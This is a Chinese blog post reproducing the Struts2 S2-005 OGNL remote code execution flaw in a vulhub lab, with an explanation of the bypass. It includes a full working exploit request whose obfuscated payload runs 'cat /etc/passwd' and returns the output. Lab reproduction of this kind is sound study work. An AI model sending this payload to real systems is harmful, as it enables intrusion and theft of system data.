vulhub中Struts2-005 远程代码执行漏洞复现

最新推荐文章于 2024-05-29 15:28:18 发布
最新推荐文章于 2024-05-29 15:28:18 发布
阅读量335 收藏 2
点赞数 14
分类专栏: vulhub漏洞复现 文章标签: struts java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/137400608
版权

影响版本: 2.0.0 - 2.1.8.1

s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上

XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:

```
user.address.city=Bishkek&user['favoriteDrink']=kumys 
//会被转化成
action.getUser().getAddress().setCity("Bishkek")  
action.getUser().setFavoriteDrink("kumys")
```

触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下:

- S2-003 使用`\u0023`绕过s2对`#`的防御
- S2-003 后官方增加了安全模式(沙盒)
- S2-005 使用OGNL表达式将沙盒关闭,继续执行代码

1.执行任意命令POC(有回显,将需要执行的命令进行urlencode编码)

POST /example/HelloWorld.action HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0)
Host: target:8080
Content-Length: 626

redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}


 

余生有个小酒馆
关注
  • 14
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub struts2漏洞搭建与复现(s2-001 s2-005
wocao___的博客
02-20 914
s2-001 github下载vulhub git clone https://github.com/vulhub/vulhub.git 下载完成后进入目录vulhub/struts2/s2-001 docker-compose up -d 启动 docker ps查看容器运行状态 浏览器访问ip+端口 查看目录vulhub/struts2/s2-001的readme文说明 S2-001 远程代码执行漏洞 原理 参考 http://rickgray.me/2016/05/06/rev
S2-005 远程代码执行漏洞
锋刃科技的博客
06-27 696
影响版本 2.0.0 ~2.1.8.1 环境搭建 cd vulhub/struts2/s2-005 docker-compose build && docker-compose up -d 漏洞复现 发生数据包包 GET /example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%..
s2系列——s2-005复现
qq_54030686的博客
03-01 4070
残缺版本exp 先采用能够爆出路径的payload,验证网址是否存在s2-005漏洞,然后在使用执行代码的payload进行利用,这里不再赘述,但是不同博主的文章下payload肯定不尽相同,有可能会出现无法利用的payload,不用担心,换一个就好 靶场使用vulhubs2-005靶场 使用正则表达式判断回显,代码来自githubstruts.py,经过些许修改,可以正常执行命令,展示 进入docker容器后,实在根目录的相应文件夹下创建文件,但是不晓得反弹shell的逻辑是啥,使用bash反弹s
Strust2 远程代码执行漏洞[s2-005]
最新发布
流水不争先,争的是滔滔不绝
05-29 690
漏洞影响版本【2.0.0 - 2.1.8.1】
vulhub-struts2-S2-005 远程代码执行漏洞复现
qq_56426046的博客
06-19 499
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 的对象数据。在 Struts2 ,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性,允许远程命令...
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
这个标题和描述提到的"struts2-scan"是一种工具,专门用来检测Struts2框架的安全漏洞Struts2漏洞通常涉及到框架的核心组件,例如OGNL(Object-Graph Navigation Language)表达式,这是一种强大的语言,允许在...
Apache Struts2 S2-005 远程代码执行漏洞
m0_63241485的博客
08-20 1521
XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:user.address.city=Bishkek&user[‘favoriteDrink’]=kumys//会被转化成触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式将安全模式关闭,又绕过了修复方法。整体过程如下:S2-003 使用\u0023绕过s2对#的防御S2-003 后官方增加了安全模式(沙盒)
(四)vulhub专栏:Struct2漏洞复现汇总(持续更新...)
云舒的博客
07-12 2086
Struct2漏洞复现汇总
S2-005 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 2708
漏洞信息 漏洞信息页面: https://cwiki.apache.org/confluence/display/WW/S2-005 漏洞成因官方概述:XWork ParameterInterceptors bypass allows remote command execution 漏洞影响: 漏洞分析 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访...
java struts2 漏洞复现合集
whatday的专栏
08-31 4580
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
Struts2漏洞S2-005复现笔记
hklearner的博客
03-30 2894
Struts2漏洞S2-001复现笔记 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻
[struts2]s2-001
satasun的博客
12-09 250
[struts2]s2-001 环境搭建 Github buuctf poc 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 测试一下: exp 获取Tomcat执行路径: %{@java.lang.Syste
[旧文系列] Struts2历史高危漏洞系列-part1:S2-001/S2-003/S2-005
mole_exp的博客
01-17 1274
文章目录关于<旧文系列>前言S2-001漏洞复现和分析可回显PoC漏洞修复S2-003漏洞复现与分析可回显PoC漏洞修复S2-005漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
Struts2-007:远程代码执行漏洞深度剖析与修复策略
Struts2-007漏洞是Apache Struts2框架的一个严重安全问题,涉及到远程代码执行的风险。该漏洞存在于Struts2 2.0.0至2.2.3版本之间,主要由于框架允许HTTP请求数据被注入到业务Action的属性,而Struts2默认的类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值